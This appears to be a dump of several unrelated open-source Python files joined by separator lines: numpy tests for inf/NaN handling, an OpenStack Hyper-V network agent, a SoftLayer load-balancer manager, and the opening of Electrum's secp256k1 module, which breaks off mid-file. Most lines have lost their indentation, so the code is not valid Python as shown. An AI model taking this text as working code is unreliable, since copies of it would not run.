with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array((1.,))/0.) == 1)
def test_posinf_scalar(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array(1.,)/0.) == 1)
def test_neginf(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array((-1.,))/0.) == 1)
def test_neginf_scalar(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array(-1.)/0.) == 1)
def test_ind(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array((0.,))/0.) == 0)
class TestIsposinf:
def test_generic(self):
with np.errstate(divide='ignore', invalid='ignore'):
vals = isposinf(np.array((-1., 0, 1))/0.)
assert_(vals[0] == 0)
assert_(vals[1] == 0)
assert_(vals[2] == 1)
class TestIsneginf:
def test_generic(self):
with np.errstate(divide='ignore', invalid='ignore'):
vals = isneginf(np.array((-1., 0, 1))/0.)
assert_(vals[0] == 1)
assert_(vals[1] == 0)
assert_(vals[2] == 0)
class TestNanToNum:
def test_generic(self):
with np.errstate(divide='ignore', invalid='ignore'):
vals = nan_to_num(np.array((-1., 0, 1))/0.)
        assert_all(vals[0] < -1e10)
        assert_all(np.isfinite(vals[0]))
        assert_(vals[1] == 0)
        assert_all(vals[2] > 1e10)
        assert_all(np.isfinite(vals[2]))
assert_equal(type(vals), np.ndarray)
# perform the same tests but with nan, posinf and neginf keywords
with np.errstate(divide='ignore', invalid='ignore'):
vals = nan_to_num(np.array((-1., 0, 1))/0.,
nan=10, posinf=20, neginf=30)
assert_equal(vals, [30, 10, 20])
assert_all(np.isfinite(vals[[0, 2]]))
assert_equal(type(vals), np.ndarray)
# perform the same test but in-place
with np.errstate(divide='ignore', invalid='ignore'):
vals = np.array((-1., 0, 1))/0.
result = nan_to_num(vals, copy=False)
assert_(result is vals)
            assert_all(vals[0] < -1e10)
            assert_all(np.isfinite(vals[0]))
            assert_(vals[1] == 0)
            assert_all(vals[2] > 1e10)
            assert_all(np.isfinite(vals[2]))
assert_equal(type(vals), np.ndarray)
# perform the same test but in-place
with np.errstate(divide='ignore', invalid='ignore'):
vals = np.array((-1., 0, 1))/0.
result = nan_to_num(vals, copy=False, nan=10, posinf=20, neginf=30)
assert_(result is vals)
assert_equal(vals, [30, 10, 20])
assert_all(np.isfinite(vals[[0, 2]]))
assert_equal(type(vals), np.ndarray)
def test_array(self):
vals = nan_to_num([1])
assert_array_equal(vals, np.array([1], int))
assert_equal(type(vals), np.ndarray)
vals = nan_to_num([1], nan=10, posinf=20, neginf=30)
assert_array_equal(vals, np.array([1], int))
assert_equal(type(vals), np.ndarray)
def test_integer(self):
vals = nan_to_num(1)
assert_all(vals == 1)
assert_equal(type(vals), np.int_)
vals = nan_to_num(1, nan=10, posinf=20, neginf=30)
assert_all(vals == 1)
assert_equal(type(vals), np.int_)
def test_float(self):
vals = nan_to_num(1.0)
assert_all(vals == 1.0)
assert_equal(type(vals), np.float_)
vals = nan_to_num(1.1, nan=10, posinf=20, neginf=30)
assert_all(vals == 1.1)
assert_equal(type(vals), np.float_)
def test_complex_good(self):
vals = nan_to_num(1+1j)
assert_all(vals == 1+1j)
assert_equal(type(vals), np.complex_)
vals = nan_to_num(1+1j, nan=10, posinf=20, neginf=30)
assert_all(vals == 1+1j)
assert_equal(type(vals), np.complex_)
def test_complex_bad(self):
with np.errstate(divide='ignore', invalid='ignore'):
v = 1 + 1j
v += np.array(0+1.j)/0.
vals = nan_to_num(v)
# !! This is actually (unexpectedly) zero
assert_all(np.isfinite(vals))
assert_equal(type(vals), np.complex_)
def test_complex_bad2(self):
with np.errstate(divide='ignore', invalid='ignore'):
v = 1 + 1j
v += np.array(-1+1.j)/0.
vals = nan_to_num(v)
assert_all(np.isfinite(vals))
assert_equal(type(vals), np.complex_)
# Fixme
#assert_all(vals.imag > 1e10) and assert_all(np.isfinite(vals))
# !! This is actually (unexpectedly) positive
# !! inf. Comment out for now, and see if it
# !! changes
#assert_all(vals.real < -1e10) and assert_all(np.isfinite(vals))
def test_do_not_rewrite_previous_keyword(self):
        # Test that values already set via one keyword (e.g. nan=np.inf) are
        # not subsequently rewritten by another keyword (e.g. posinf).
with np.errstate(divide='ignore', invalid='ignore'):
vals = nan_to_num(np.array((-1., 0, 1))/0., nan=np.inf, posinf=999)
assert_all(np.isfinite(vals[[0, 2]]))
assert_all(vals[0] < -1e10)
assert_equal(vals[[1, 2]], [np.inf, 999])
assert_equal(type(vals), np.ndarray)
class TestRealIfClose:
def test_basic(self):
a = np.random.rand(10)
b = real_if_close(a+1e-15j)
assert_all(isrealobj(b))
assert_array_equal(a, b)
b = real_if_close(a+1e-7j)
assert_all(iscomplexobj(b))
b = real_if_close(a+1e-7j, tol=1e-6)
assert_all(isrealobj(b))
class TestArrayConversion:
def test_asfarray(self):
a = asfarray(np.array([1, 2, 3]))
assert_equal(a.__class__, np.ndarray)
assert_(np.issubdtype(a.dtype, np.floating))
# previously this would infer dtypes from arrays, unlike every single
# other numpy function
assert_raises(TypeError,
asfarray, np.array([1, 2, 3]), dtype=np.array(1.0))
|
|
# Copyright 2013 Cloudbase Solutions SRL
# Copyright 2013 Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
import time
from hyperv.common.i18n import _, _LE, _LI
from hyperv.common import log as logging
from hyperv.neutron import constants
from hyperv.neutron import utils
from hyperv.neutron import utilsfactory
LOG = logging.getLogger(__name__)
class HyperVNeutronAgentMixin(object):
def __init__(self, conf=None):
"""Initializes local configuration of the Hyper-V Neutron Agent.
:param conf: dict or dict-like object containing the configuration
details used by this Agent. If None is specified, default
values are used instead. conf format is as follows:
{
'host': string,
'AGENT': {'polling_interval': int,
'local_network_vswitch': string,
'physical_network_vswitch_mappings': array,
'enable_metrics_collection': boolean,
'metrics_max_retries': int},
'SECURITYGROUP': {'enable_security_group': boolean}
}
For more information on the arguments, their meaning and their default
values, visit: http://docs.openstack.org/juno/config-reference/content/
networking-plugin-hyperv_agent.html
"""
super(HyperVNeutronAgentMixin, self).__init__()
self._utils = utilsfactory.get_hypervutils()
self._network_vswitch_map = {}
self._port_metric_retries = {}
self.plugin_rpc = None
conf = conf or {}
agent_conf = conf.get('AGENT', {})
security_conf = conf.get('SECURITYGROUP', {})
self._host = conf.get('host', None)
self._polling_interval = agent_conf.get('polling_interval', 2)
self._local_network_vswitch = agent_conf.get('local_network_vswitch',
'private')
self._phys_net_map = agent_conf.get(
'physical_network_vswitch_mappings', [])
self.enable_metrics_collection = agent_conf.get(
'enable_metrics_collection', False)
self._metrics_max_retries = agent_conf.get('metrics_max_retries', 100)
self.enable_security_groups = security_conf.get(
'enable_security_group', False)
self._load_physical_network_mappings(self._phys_net_map)
def _load_physical_network_mappings(self, phys_net_vswitch_mappings):
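        # Each mapping is a 'physical_network:vswitch_name' pair; the physical
        # network part may use '*' as a wildcard (it is compiled to '.*').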
self._physical_network_mappings = {}
for mapping in phys_net_vswitch_mappings:
parts = mapping.split(':')
if len(parts) != 2:
LOG.debug('Invalid physical network mapping: %s', mapping)
else:
pattern = re.escape(parts[0].strip()).replace('\\*', '.*')
vswitch = parts[1].strip()
self._physical_network_mappings[pattern] = vswitch
def _get_vswitch_for_physical_network(self, phys_network_name):
for pattern in self._physical_network_mappings:
if phys_network_name is None:
phys_network_name = ''
if re.match(pattern, phys_network_name):
return self._physical_network_mappings[pattern]
# Not found in the mappings, the vswitch has the same name
return phys_network_name
    def _get_network_vswitch_map_by_port_id(self, port_id):
        for network_id, vswitch_map in self._network_vswitch_map.iteritems():
            if port_id in vswitch_map['ports']:
                return (network_id, vswitch_map)
        # The port is not bound to any known network; return an explicit
        # tuple so callers can unpack the result safely.
        return (None, None)
def network_delete(self, context, network_id=None):
LOG.debug("network_delete received. "
"Deleting network %s", network_id)
# The network may not be defined on this agent
if network_id in self._network_vswitch_map:
self._reclaim_local_network(network_id)
else:
LOG.debug("Network %s not defined on agent.", network_id)
def port_delete(self, context, port_id=None):
LOG.debug("port_delete received")
self._port_unbound(port_id)
def port_update(self, context, port=None, network_type=None,
segmentation_id=None, physical_network=None):
LOG.debug("port_update received")
if self.enable_security_groups:
if 'security_groups' in port:
self.sec_groups_agent.refresh_firewall()
self._treat_vif_port(
port['id'], port['network_id'],
network_type, physical_network,
segmentation_id, port['admin_state_up'])
def _get_vswitch_name(self, network_type, physical_network):
if network_type != constants.TYPE_LOCAL:
vswitch_name = self._get_vswitch_for_physical_network(
physical_network)
else:
            vswitch_name = self._local_network_vswitch
return vswitch_name
def _provision_network(self, port_id,
net_uuid, network_type,
physical_network,
segmentation_id):
LOG.info(_LI("Provisioning network %s"), net_uuid)
vswitch_name = self._get_vswitch_name(network_type, physical_network)
if network_type == constants.TYPE_VLAN:
self._utils.set_switch_external_port_trunk_vlan(vswitch_name,
segmentation_id, constants.TRUNK_ENDPOINT_MODE)
elif network_type == constants.TYPE_FLAT:
#Nothing to do
pass
elif network_type == constants.TYPE_LOCAL:
#TODO(alexpilotti): Check that the switch type is private
#or create it if not existing
pass
else:
raise utils.HyperVException(
msg=(_("Cannot provision unknown network type %(network_type)s"
" for network %(net_uuid)s") %
dict(network_type=network_type, net_uuid=net_uuid)))
        vswitch_map = {
            'network_type': network_type,
            'vswitch_name': vswitch_name,
            'ports': [],
            'vlan_id': segmentation_id}
        self._network_vswitch_map[net_uuid] = vswitch_map
def _reclaim_local_network(self, net_uuid):
LOG.info(_LI("Reclaiming local network %s"), net_uuid)
del self._network_vswitch_map[net_uuid]
def _port_bound(self, port_id,
net_uuid,
network_type,
physical_network,
segmentation_id):
LOG.debug("Binding port %s", port_id)
if net_uuid not in self._network_vswitch_map:
self._provision_network(
port_id, net_uuid, network_type,
physical_network, segmentation_id)
        vswitch_map = self._network_vswitch_map[net_uuid]
        vswitch_map['ports'].append(port_id)
        self._utils.connect_vnic_to_vswitch(vswitch_map['vswitch_name'],
                                            port_id)
if network_type == constants.TYPE_VLAN:
LOG.info(_LI('Binding VLAN ID %(segmentation_id)s '
'to switch port %(port_id)s'),
dict(segmentation_id=segmentation_id, port_id=port_id))
self._utils.set_vswitch_port_vlan_id(
segmentation_id,
port_id)
elif network_type == constants.TYPE_FLAT:
#Nothing to do
pass
elif network_type == constants.TYPE_LOCAL:
#Nothing to do
pass
else:
LOG.error(_LE('Unsupported network type %s'), network_type)
if self.enable_metrics_collection:
self._utils.enable_port_metrics_collection(port_id)
self._port_metric_retries[port_id] = self._metrics_max_retries
    def _port_unbound(self, port_id, vnic_deleted=False):
        (net_uuid, vswitch_map) = self._get_network_vswitch_map_by_port_id(
            port_id)
        if net_uuid not in self._network_vswitch_map:
            LOG.info(_LI('Network %s is not available on this agent'),
                     net_uuid)
            return
        LOG.debug("Unbinding port %s", port_id)
        self._utils.disconnect_switch_port(vswitch_map['vswitch_name'],
                                           port_id, vnic_deleted, True)
        vswitch_map['ports'].remove(port_id)
        if not vswitch_map['ports']:
            self._reclaim_local_network(net_uuid)
def _port_enable_control_metrics(self):
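        # Metrics sometimes cannot be enabled right after a port is bound
        # (e.g. while the VM is still starting). Retry once per polling
        # iteration; after _metrics_max_retries attempts, enable the metrics
        # unconditionally and log an error.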
if not self.enable_metrics_collection:
return
for port_id in self._port_metric_retries.keys():
if self._utils.can_enable_control_metrics(port_id):
self._utils.enable_control_metrics(port_id)
LOG.info(_LI('Port metrics enabled for port: %s'), port_id)
del self._port_metric_retries[port_id]
elif self._port_metric_retries[port_id] < 1:
self._utils.enable_control_metrics(port_id)
LOG.error(_LE('Port metrics raw enabling for port: %s'),
port_id)
del self._port_metric_retries[port_id]
else:
self._port_metric_retries[port_id] -= 1
def _update_ports(self, registered_ports):
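        # Returns None when the port set is unchanged; otherwise a dict with
        # the current port set and the added/removed deltas.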
ports = self._utils.get_vnic_ids()
if ports == registered_ports:
return
added = ports - registered_ports
removed = registered_ports - ports
return {'current': ports,
'added': added,
'removed': removed}
def _treat_vif_port(self, port_id, network_id, network_type,
physical_network, segmentation_id,
admin_state_up):
if self._utils.vnic_port_exists(port_id):
if admin_state_up:
self._port_bound(port_id, network_id, network_type,
physical_network, segmentation_id)
else:
self._port_unbound(port_id)
else:
LOG.debug("No port %s defined on agent.", port_id)
def _treat_devices_added(self, devices):
try:
devices_details_list = self.plugin_rpc.get_devices_details_list(
self.context,
devices,
self.agent_id)
except Exception as e:
LOG.debug("Unable to get ports details for "
"devices %(devices)s: %(e)s",
{'devices': devices, 'e': e})
# resync is needed
return True
for device_details in devices_details_list:
device = device_details['device']
LOG.info(_LI("Adding port %s"), device)
if 'port_id' in device_details:
LOG.info(_LI("Port %(device)s updated. Details: "
"%(device_details)s"),
{'device': device, 'device_details': device_details})
self._treat_vif_port(
device_details['port_id'],
device_details['network_id'],
device_details['network_type'],
device_details['physical_network'],
device_details['segmentation_id'],
device_details['admin_state_up'])
# check if security groups is enabled.
# if not, teardown the security group rules
if self.enable_security_groups:
self.sec_groups_agent.prepare_devices_filter([device])
else:
self._utils.remove_all_security_rules(
device_details['port_id'])
self.plugin_rpc.update_device_up(self.context,
device,
self.agent_id,
self._host)
return False
def _treat_devices_removed(self, devices):
resync = False
for device in devices:
LOG.info(_LI("Removing port %s"), device)
try:
self.plugin_rpc.update_device_down(self.context,
device,
self.agent_id,
self._host)
except Exception as e:
LOG.debug("Removing port failed for device %(device)s: %(e)s",
dict(device=device, e=e))
resync = True
continue
self._port_unbound(device, vnic_deleted=True)
return resync
def _process_network_ports(self, port_info):
resync_a = False
resync_b = False
if 'added' in port_info:
resync_a = self._treat_devices_added(port_info['added'])
if 'removed' in port_info:
resync_b = self._treat_devices_removed(port_info['removed'])
# If one of the above operations fails => resync with plugin
return (resync_a | resync_b)
def daemon_loop(self):
sync = True
ports = set()
while True:
try:
start = time.time()
if sync:
LOG.info(_LI("Agent out of sync with plugin!"))
ports.clear()
sync = False
port_info = self._update_ports(ports)
# notify plugin about port deltas
if port_info:
LOG.debug("Agent loop has new devices!")
# If treat devices fails - must resync with plugin
sync = self._process_network_ports(port_info)
ports = port_info['current']
self._port_enable_control_metrics()
except Exception:
LOG.exception(_LE("Error in agent event loop"))
sync = True
# sleep till end of polling interval
elapsed = (time.time() - start)
if (elapsed < self._polling_interval):
time.sleep(self._polling_interval - elapsed)
else:
LOG.debug("Loop iteration exceeded interval "
"(%(polling_interval)s vs. %(elapsed)s)",
{'polling_interval': self._polling_interval,
'elapsed': elapsed})
|
|
"""
SoftLayer.load_balancer
~~~~~~~~~~~~~~~~~~~~~~~
Load Balancer Manager/helpers
:license: MIT, see LICENSE for more details.
"""
from SoftLayer import exceptions
from SoftLayer.managers import ordering
from SoftLayer import utils
class LoadBalancerManager(utils.IdentifierMixin, object):
"""Manages SoftLayer load balancers.
See product information here: https://www.ibm.com/cloud/load-balancer
:param SoftLayer.API.BaseClient client: the client instance
"""
TYPE = {
1: "Public to Private",
0: "Private to Private",
2: "Public to Public",
}
def __init__(self, client):
self.client = client
self.account = self.client['Account']
self.prod_pkg = self.client['Product_Package']
# Citrix Netscalers
self.adc = self.client['Network_Application_Delivery_Controller']
        # IBM Cloud LB
self.lbaas = self.client['Network_LBaaS_LoadBalancer']
self.package_keyname = 'LBAAS'
def get_adcs(self, mask=None):
"""Returns a list of all netscalers.
:returns: SoftLayer_Network_Application_Delivery_Controller[].
"""
if mask is None:
mask = 'mask[managementIpAddress,outboundPublicBandwidthUsage,primaryIpAddress,datacenter]'
return self.account.getApplicationDeliveryControllers(mask=mask)
def get_adc(self, identifier, mask=None):
"""Returns a netscaler object.
:returns: SoftLayer_Network_Application_Delivery_Controller.
"""
if mask is None:
mask = "mask[networkVlans, password, managementIpAddress, primaryIpAddress, subnets, tagReferences, " \
"licenseExpirationDate, datacenter]"
return self.adc.getObject(id=identifier, mask=mask)
def get_lbaas(self, mask=None):
"""Returns a list of IBM Cloud Loadbalancers
:returns: SoftLayer_Network_LBaaS_LoadBalancer[]
"""
if mask is None:
mask = "mask[datacenter,listenerCount,memberCount]"
this_lb = self.lbaas.getAllObjects(mask=mask)
return this_lb
def get_lb(self, identifier, mask=None):
"""Returns a IBM Cloud LoadBalancer
:returns: SoftLayer_Network_LBaaS_LoadBalancer
"""
if mask is None:
mask = "mask[healthMonitors, l7Pools, members, sslCiphers, " \
"listeners[defaultPool[healthMonitor, members, sessionAffinity],l7Policies]]"
this_lb = self.lbaas.getObject(id=identifier, mask=mask)
health = self.lbaas.getLoadBalancerMemberHealth(this_lb.get('uuid'))
this_lb['health'] = health
return this_lb
def update_lb_health_monitors(self, uuid, checks):
"""calls SoftLayer_Network_LBaaS_HealthMonitor::updateLoadBalancerHealthMonitors()
- `updateLoadBalancerHealthMonitors <https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_\
HealthMonitor/updateLoadBalancerHealthMonitors/>`_
- `SoftLayer_Network_LBaaS_LoadBalancerHealthMonitorConfiguration <https://sldn.softlayer.com/reference/\
datatypes/SoftLayer_Network_LBaaS_LoadBalancerHealthMonitorConfiguration/>`_
:param uuid: loadBalancerUuid
:param checks list: SoftLayer_Network_LBaaS_LoadBalancerHealthMonitorConfiguration[]
"""
# return self.lbaas.updateLoadBalancerHealthMonitors(uuid, checks)
return self.client.call('SoftLayer_Network_LBaaS_HealthMonitor', 'updateLoadBalancerHealthMonitors',
uuid, checks)
def get_lbaas_uuid_id(self, identifier):
"""Gets a LBaaS uuid, id. Since sometimes you need one or the other.
:param identifier: either the LB Id, UUID or Name, this function will return UUI and LB Id.
:return (uuid, id):
"""
mask = "mask[id,uuid]"
if isinstance(identifier, int) or identifier.isdigit():
this_lb = self.lbaas.getObject(id=identifier, mask=mask)
elif len(identifier) == 36 and utils.UUID_RE.match(identifier):
this_lb = self.lbaas.getLoadBalancer(identifier, mask=mask)
else:
this_lb = self.get_lbaas_by_name(identifier, mask=mask)
return this_lb.get('uuid'), this_lb.get('id')
def get_lbaas_by_name(self, name, mask=None):
"""Gets a LBaaS by name.
:param name: Name of the LBaaS instance
:param mask:
:returns: SoftLayer_Network_LBaaS_LoadBalancer.
"""
object_filter = {'name': {'operation': name}}
this_lbs = self.lbaas.getAllObjects(filter=object_filter, mask=mask)
if not this_lbs:
raise exceptions.SoftLayerError("Unable to find LBaaS with name: {}".format(name))
return this_lbs[0]
def delete_lb_member(self, identifier, member_id):
"""Removes a member from a LBaaS instance
https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_Member/deleteLoadBalancerMembers/
:param identifier: UUID of the LBaaS instance
:param member_id: Member UUID to remove.
"""
return self.client.call('SoftLayer_Network_LBaaS_Member', 'deleteLoadBalancerMembers',
identifier, [member_id])
def add_lb_member(self, identifier, service_info):
"""Adds a member to a LBaaS instance
        https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_Member/addLoadBalancerMembers/
:param identifier: UUID of the LBaaS instance
:param service_info: datatypes/SoftLayer_Network_LBaaS_LoadBalancerServerInstanceInfo
"""
return self.client.call('SoftLayer_Network_LBaaS_Member', 'addLoadBalancerMembers',
identifier, [service_info])
def add_lb_listener(self, identifier, listener):
"""Adds or update a listener to a LBaaS instance
When using this to update a listener, just include the 'listenerUuid' in the listener object
See the following for listener configuration options
https://sldn.softlayer.com/reference/datatypes/SoftLayer_Network_LBaaS_LoadBalancerProtocolConfiguration/
:param identifier: UUID of the LBaaS instance
:param listener: Object with all listener configurations
"""
return self.client.call('SoftLayer_Network_LBaaS_Listener', 'updateLoadBalancerProtocols',
identifier, [listener])
def get_l7policies(self, identifier):
"""Gets Layer7 policies from a listener
:param identifier: id
"""
return self.client.call('SoftLayer_Network_LBaaS_Listener', 'getL7Policies', id=identifier)
def get_all_l7policies(self):
"""Gets all Layer7 policies
:returns: Dictionary of (protocol_id: policies list).
"""
mask = 'mask[listeners[l7Policies]]'
lbaas = self.get_lbaas(mask=mask)
listeners = []
for load_bal in lbaas:
listeners.extend(load_bal.get('listeners'))
policies = {}
for protocol in listeners:
if protocol.get('l7Policies'):
listener_id = protocol.get('id')
l7policies = protocol.get('l7Policies')
policies[listener_id] = l7policies
return policies
def add_lb_l7_pool(self, identifier, pool, members, health, session):
"""Creates a new l7 pool for a LBaaS instance
- https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_L7Pool/createL7Pool/
- https://cloud.ibm.com/docs/infrastructure/loadbalancer-service?topic=loadbalancer-service-api-reference
:param identifier: UUID of the LBaaS instance
:param pool SoftLayer_Network_LBaaS_L7Pool: Description of the pool
:param members SoftLayer_Network_LBaaS_L7Member[]: Array of servers with their address, port, weight
        :param health SoftLayer_Network_LBaaS_L7HealthMonitor: A health monitor
        :param session SoftLayer_Network_LBaaS_L7SessionAffinity: Whether to use session affinity
"""
return self.client.call('SoftLayer_Network_LBaaS_L7Pool', 'createL7Pool',
identifier, pool, members, health, session)
def del_lb_l7_pool(self, identifier):
"""Deletes a l7 pool
:param identifier: Id of the L7Pool
"""
return self.client.call('SoftLayer_Network_LBaaS_L7Pool', 'deleteObject', id=identifier)
def remove_lb_listener(self, identifier, listener):
"""Removes a listener to a LBaaS instance
:param identifier: UUID of the LBaaS instance
:param listener: UUID of the Listner to be removed.
"""
return self.client.call('SoftLayer_Network_LBaaS_Listener', 'deleteLoadBalancerProtocols',
identifier, [listener])
def order_lbaas(self, datacenter, name, desc, protocols, subnet_id, public=False, verify=False):
"""Allows to order a Load Balancer
:param datacenter: Shortname for the SoftLayer datacenter to order in.
:param name: Identifier for the new LB.
:param desc: Optional description for the lb.
:param protocols: https://sldn.softlayer.com/reference/datatypes/SoftLayer_Network_LBaaS_Listener/
:param subnet_id: Id of the subnet for this new LB to live on.
:param public: Use Public side for the backend.
:param verify: Don't actually order if True.
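        Example (illustrative values only; the field names follow the
        SoftLayer_Network_LBaaS_LoadBalancerProtocolConfiguration datatype):
            protocols = [{'frontendPort': 80, 'frontendProtocol': 'HTTP',
                          'backendPort': 8080, 'backendProtocol': 'HTTP',
                          'loadBalancingMethod': 'ROUNDROBIN'}]
            # verify=True prices the order without actually placing it
            mgr.order_lbaas('dal13', 'my-lb', 'test LB', protocols,
                            subnet_id=12345, verify=True)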
"""
order_mgr = ordering.OrderingManager(self.client)
package = order_mgr.get_package_by_key(self.package_keyname, mask='mask[id,keyName,itemPrices]')
prices = []
for price in package.get('itemPrices'):
if not price.get('locationGroupId', False):
prices.append(price.get('id'))
# Build the configuration of the order
order_data = {
'complexType': 'SoftLayer_Container_Product_Order_Network_LoadBalancer_AsAService',
'name': name,
'description': desc,
'location': datacenter,
'packageId': package.get('id'),
'useHourlyPricing': True, # Required since LBaaS is an hourly service
'prices': [{'id': price_id} for price_id in prices],
'protocolConfigurations': protocols,
'subnets': [{'id': subnet_id}],
'isPublic': public
}
if verify:
response = self.client['Product_Order'].verifyOrder(order_data)
else:
response = self.client['Product_Order'].placeOrder(order_data)
return response
def lbaas_order_options(self):
"""Gets the options to order a LBaaS instance."""
_filter = {'keyName': {'operation': self.package_keyname}}
mask = "mask[id,keyName,name,items[prices],regions[location[location[groups]]]]"
package = self.client.call('SoftLayer_Product_Package', 'getAllObjects', filter=_filter, mask=mask)
return package.pop()
def cancel_lbaas(self, uuid):
"""Cancels a LBaaS instance.
https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_LoadBalancer/cancelLoadBalancer/
:param uuid string: UUID of the LBaaS instance to cancel
"""
return self.lbaas.cancelLoadBalancer(uuid)
|
|
# -*- coding: utf-8 -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import base64
import hmac
import hashlib
from typing import Tuple, Union
import ecdsa
from ecdsa.ecdsa import curve_secp256k1, generator_secp256k1
from ecdsa.curves import SECP256k1
from ecdsa.ellipticcurve import Point
from ecdsa.util import string_to_number, number_to_string
from .util import bfh, bh2u, assert_bytes, print_error, to_bytes, InvalidPassword, profiler
from .crypto import (Hash, aes_encrypt_with_iv, aes_decrypt_with_iv, hmac_oneshot)
from .ecc_fast import do_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1
do_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1()
CURVE_ORDER = SECP256k1.order
def generator():
return ECPubkey.from_point(generator_secp256k1)
def point_at_infinity():
return ECPubkey(None)
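# Signature encoding helpers: a "sig_string" is the fixed-size 64-byte r||s
# encoding, while "der_sig" is the variable-length ASN.1 DER encoding used in
# Bitcoin transactions. The *_canonize variants enforce low-S signatures.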
def sig_string_from_der_sig(der_sig, order=CURVE_ORDER):
r, s = ecdsa.util.sigdecode_der(der_sig, order)
return ecdsa.util.sigencode_string(r, s, order)
def der_sig_from_sig_string(sig_string, order=CURVE_ORDER):
r, s = ecdsa.util.sigdecode_string(sig_string, order)
return ecdsa.util.sigencode_der_canonize(r, s, order)
def der_sig_from_r_and_s(r, s, order=CURVE_ORDER):
return ecdsa.util.sigencode_der_canonize(r, s, order)
def get_r_and_s_from_der_sig(der_sig, order=CURVE_ORDER):
r, s = ecdsa.util.sigdecode_der(der_sig, order)
return r, s
def get_r_and_s_from_sig_string(sig_string, order=CURVE_ORDER):
r, s = ecdsa.util.sigdecode_string(sig_string, order)
return r, s
def sig_string_from_r_and_s(r, s, order=CURVE_ORDER):
return ecdsa.util.sigencode_string_canonize(r, s, order)
def point_to_ser(P, compressed=True) -> bytes:
if isinstance(P, tuple):
assert len(P) == 2, 'unexpected point: %s' % P
x, y = P
else:
x, y = P.x(), P.y()
if x is None or y is None: # infinity
return None
if compressed:
return bfh(('%02x' % (2+(y&1))) + ('%064x' % x))
return bfh('04'+('%064x' % x)+('%064x' % y))
def get_y_coord_from_x(x, odd=True):
curve = curve_secp256k1
_p = curve.p()
_a = curve.a()
_b = curve.b()
for offset in range(128):
Mx = x + offset
        # Weierstrass form: y^2 = x^3 + a*x + b (mod p); for secp256k1 a == 0
        My2 = (pow(Mx, 3, _p) + _a * Mx + _b) % _p
        # p % 4 == 3 for secp256k1, so My2 ** ((p+1)//4) is a square root
        My = pow(My2, (_p + 1) // 4, _p)
if curve.contains_point(Mx, My):
if odd == bool(My & 1):
return My
return _p - My
raise Exception('ECC_YfromX: No Y found')
def ser_to_point(ser: bytes) -> Tuple[int, int]:
if ser[0] not in (0x02, 0x03, 0x04):
raise ValueError('Unexpected first byte: {}'.format(ser[0]))
if ser[0] == 0x04:
return string_to_number(ser[1:33]), string_to_number(ser[33:])
x = string_to_number(ser[1:])
return x, get_y_coord_from_x(x, ser[0] == 0x03)
def _ser_to_python_ecdsa_point(ser: bytes) -> ecdsa.ellipticcurve.Point:
x, y = ser_to_point(ser)
try:
return Point(curve_secp256k1, x, y, CURVE_ORDER)
    except Exception:
raise InvalidECPointException()
class InvalidECPointException(Exception):
"""e.g. not on curve, or infinity"""
class _MyVerifyingKey(ecdsa.VerifyingKey):
@classmethod
def from_signature(klass, sig, recid, h, curve): # TODO use libsecp??
""" See http://www.secg.org/download/aid-780/sec1-v2.pdf, chapter 4.1.6 """
from ecdsa import util, numbertheory
from . import msqr
curveFp = curve.curve
G = curve.generator
order = G.order()
# extract r,s from signature
r, s = util.sigdecode_string(sig, order)
# 1.1
x = r + (recid//2) * order
# 1.3
alpha = ( x * x * x + curveFp.a() * x + curveFp.b() ) % curveFp.p()
beta = msqr.modular_sqrt(alpha, curveFp.p())
y = beta if (beta - recid) % 2 == 0 else curveFp.p() - beta
# 1.4 the constructor checks that nR is at infinity
try:
R = Point(curveFp, x, y, order)
        except Exception:
raise InvalidECPointException()
# 1.5 compute e from message:
e = string_to_number(h)
minus_e = -e % order
# 1.6 compute Q = r^-1 (sR - eG)
inv_r = numbertheory.inverse_mod(r,order)
try:
Q = inv_r * ( s * R + minus_e * G )
        except Exception:
raise InvalidECPointException()
return klass.from_public_point( Q, curve )
class _MySigningKey(ecdsa.SigningKey):
"""Enforce low S values in signatures"""
def sign_number(self, number, entropy=None, k=None):
r, s = ecdsa.SigningKey.sign_number(self, number, entropy, k)
if s > CURVE_ORDER//2:
s = CURVE_ORDER - s
return r, s
class _PubkeyForPointAtInfinity:
point = ecdsa.ellipticcurve.INFINITY
class ECPubkey(object):
def __init__(self, b: bytes):
if b is not None:
assert_bytes(b)
point = _ser_to_python_ecdsa_point(b)
self._pubkey = ecdsa.ecdsa.Public_key(generator_secp256k1, point)
else:
self._pubkey = _PubkeyForPointAtInfinity()
@classmethod
